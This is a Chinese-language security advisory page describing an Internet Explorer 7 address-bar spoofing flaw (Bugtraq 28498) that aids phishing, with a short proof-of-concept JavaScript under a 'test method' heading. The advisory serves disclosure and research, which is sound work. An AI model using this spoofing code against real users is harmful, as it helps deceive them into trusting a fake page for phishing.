受影响系统:MicrosoftInternetExplorer7.0描述:BUGTRAQID:28498InternetExplorer是微软发布的非常流行的WEB浏览器。如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有
受影响系统:
  Microsoft Internet Explorer 7.0   描述:   BUGTRAQ ID: 28498   Internet Explorer是微软发布的非常流行的WEB浏览器。   如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。   <*来源:Juan Pablo Lopez Yacubian ([email protected])   链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2   *>   测试方法:   警 告   以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <script language="JavaScript">
function iniciar()
{ nuevaventana = window.open("", "Win", "width=500,height=500,location=1"); nuevaventana.document.location = "http://www.google.com.ar/#" "www.microsoft.com/"; }
iniciar()
</script>

  建议:   目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:   http://www.microsoft.com/windows/ie/default.asp

最新资讯
小牛电动CEO:年产量有望增至200万辆 暂无造车计划

小牛电动CEO:年产量有

电动踏板车制造商小牛电动的首席执行官近日表示,小牛电
东风自动驾驶出租车武汉成功“上路”

东风自动驾驶出租车武

搭载北斗定位系统、利用5G通信技术、具备自动感知能力
李焕英救不了内容创作的崩盘

李焕英救不了内容创作

《李焕英》救不了电影行业的内容差,就像《流浪地球》救
涂鸦智能冲刺美股:年亏6691万美元 腾讯高瓴是股东

涂鸦智能冲刺美股:年亏

>  涂鸦智能日前向美国SEC递交招股书,准备在纽交所上
艰难前行的网络文学,二次元文化会成为新动力吗?

艰难前行的网络文学,二

一个有趣的问题:当一种亚文化催生出了千亿规模的市场和
“中国版Clubhouse”引爆2021年互联网第一场大战?

“中国版Clubhouse”

在创投圈,“中国版Clubhouse”究竟是一场“真风口”还
最新文章
宝塔面板 phpmyadmin 未授权访问漏洞 BUG ip:888/pma的问题分析

宝塔面板 phpmyadmin

这篇文章主要介绍了宝塔面板 phpmyadmin 未授权访问漏
CPU幽灵和熔断漏洞是什么?Intel为大家简单易懂的科普了一番

CPU幽灵和熔断漏洞是

不久前让整全行业紧张、全球用户恐慌的Spectre幽灵、M
解析文件上传漏洞 从FCKEditor文件上传漏洞谈起

解析文件上传漏洞 从F

大部分的用户可能不要了解文件上传漏洞,下面小编就为大
手把手教你如何构造Office漏洞POC(以CVE-2012-0158为例)

手把手教你如何构造Of

近年来APT追踪盛行,最常见的就是各种以钓鱼开始的攻击
漏洞 自动化脚本 论漏洞和自动化脚本的区别

漏洞 自动化脚本 论漏

漏洞无处不在,它是在硬件、软件、协议的具体实现或系统
Python 爬虫修养-处理动态网页

Python 爬虫修养-处理

在爬虫开发中,大家可以很轻易地 bypass 所谓的 UA 限制